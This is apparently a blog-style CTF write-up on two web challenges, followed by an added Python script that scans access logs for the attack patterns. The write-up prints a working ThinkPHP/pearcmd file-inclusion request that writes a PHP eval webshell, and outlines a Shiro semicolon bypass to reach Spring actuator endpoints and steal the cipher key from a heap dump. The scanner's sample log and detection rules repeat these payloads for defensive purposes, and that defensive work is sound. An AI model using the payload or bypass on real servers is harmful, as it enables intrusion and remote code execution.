CTF Web Security

Huxiang Cup Web

Posted on 2021-11-15, 1 min read

Web

easywill

TP Nday file inclusion

GET /?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/hello.php HTTP/1.1
Host: eci-2ze6yq2cnbmg51st9iod.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __jsluid_h=30528b3933fbcb220b43f1e3f659db2a; PHPSESSID=31fd5c83e847bbaefce9c16b2a6f9bee
Connection: close

Pentest in Autumn

pom.xml was provided.

Found that actuator is present. In Spring Boot 2 the endpoint is actuator/env. Access requires authentication. Shiro 1.5.0.

/;/actuator/env does the trick. POST isn't allowed, but there is a Shiro dependency, so Shiro deserialization can be considered.

Dump the memory. Use a tool to get Shiro's key. Base64 it. Specify the key and fire away.
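As an added defender-side example (not from the original writeup), the following Python flags both request patterns described in this post in web server access logs: the pearcmd.php config-create file inclusion and the ';' path-segment bypass used to reach /actuator/env and /actuator/heapdump. The log lines, IP addresses and rule names are constructed; the first log line is the page's request as a server would record it with the payload percent-encoded.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (combined-style format). The first line is the
# writeup's pearcmd request as a web server would log it, payload percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Nov/2021:10:00:01 +0800] "GET /?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/%3C%3F%3Deval%28%24_POST%5B1%5D%29%3B%3F%3E+/tmp/hello.php HTTP/1.1" 200 512
10.0.0.6 - - [15/Nov/2021:10:00:02 +0800] "GET /;/actuator/env HTTP/1.1" 200 8192
10.0.0.6 - - [15/Nov/2021:10:00:03 +0800] "GET /;/actuator/heapdump HTTP/1.1" 200 104857600
10.0.0.7 - - [15/Nov/2021:10:00:04 +0800] "GET /index.php?page=home HTTP/1.1" 200 2048
10.0.0.8 - - [15/Nov/2021:10:00:05 +0800] "GET /actuator/health HTTP/1.1" 401 0
"""

# Minimal parser for one combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def _pearcmd(path, full):
    # pearcmd.php is reached through the include and driven by the '+'-separated
    # argv in the query string; config-create is the subcommand that writes a file.
    return "pearcmd.php" in full and "config-create" in full


def _php_tag(path, full):
    # A PHP opening tag anywhere in a request is never legitimate user input.
    return "<?" in full


def _shiro_semicolon(path, full):
    # Shiro's path matching stops at ';' (matrix parameters) while Spring MVC
    # normalises the path, so "/;/actuator/..." reaches the endpoint without the
    # Shiro filter chain applying. Checked on the decoded path only.
    return re.search(r';[^?]*/actuator/', path) is not None


def _heapdump(path, full):
    # A heap dump leaks in-memory secrets such as the Shiro cipher key.
    return "/actuator/heapdump" in path


# Rule name -> predicate over (decoded lowercase path, decoded lowercase target).
RULES = [
    ("pearcmd-config-create", _pearcmd),
    ("php-tag-in-request", _php_tag),
    ("shiro-semicolon-bypass", _shiro_semicolon),
    ("actuator-heapdump", _heapdump),
]


def classify(target):
    """Return the names of all rules matched by a raw request target."""
    raw_path, _, _ = target.partition("?")          # split before decoding so an
    path = unquote(raw_path).lower()                 # encoded '?' cannot hide a path
    full = unquote(unquote(target)).lower()          # double-decode catches %25-encoding
    return [name for name, check in RULES if check(path, full)]


def scan(log_text):
    """Parse access log text and return one finding per line that matched a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m["target"])
        if rules:
            findings.append({
                "ip": m["ip"],
                "target": m["target"],
                "status": int(m["status"]),
                "rules": rules,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["status"], ", ".join(finding["rules"]), finding["target"])
```

The path check is done on the raw path split before decoding, so a percent-encoded `?` cannot move part of the path into the "query" and evade the semicolon rule; the keyword checks run on a double-decoded copy of the whole target so that `%253C` style encoding is also caught.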

